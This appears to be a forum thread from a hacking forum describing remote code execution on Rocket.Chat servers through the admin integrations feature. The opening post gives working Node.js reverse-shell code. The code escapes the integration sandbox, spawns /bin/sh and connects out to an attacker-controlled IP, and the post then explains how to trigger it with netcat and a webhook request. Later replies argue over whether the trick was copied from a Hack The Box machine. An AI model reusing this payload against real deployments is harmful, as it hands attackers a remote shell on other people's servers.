Статья Rocket Chat RCE

[oxostore]

Hello Team,

www.rocket.chat

you must have Mod/Admin Panel Account , Guests cant add Integrations.

trick is simple , its based on node so we can get reverse connection

login and go to INTEGRATION

added a js code for reverse shell

const require = console.log.constructor('return process.mainModule.require')();
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(1337, "XX.XX.XX.XX", function()
{ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); });

activate netcat on the same port and curl the webhook !

we got a reverse connection!

Long live js <3

no translation needed i believe images says it all !

never shared on other forums , keep the content copyright to XSS!

./0x0​

 

[xrahitel]

​

never shared on other forums , keep the content copyright to XSS!​

Вот именно тыц)

 

[oxostore]

Вот именно тыц)

seems it was listed as a machine in htb challenge and as you can see Mr.Sherlock the js code used is different.

concept is the same yes , anyway consider it explaining for the bug and not something private to be shared for public , rocket chat bugs is there since forever and its explained online but never shared.

thanks for passing .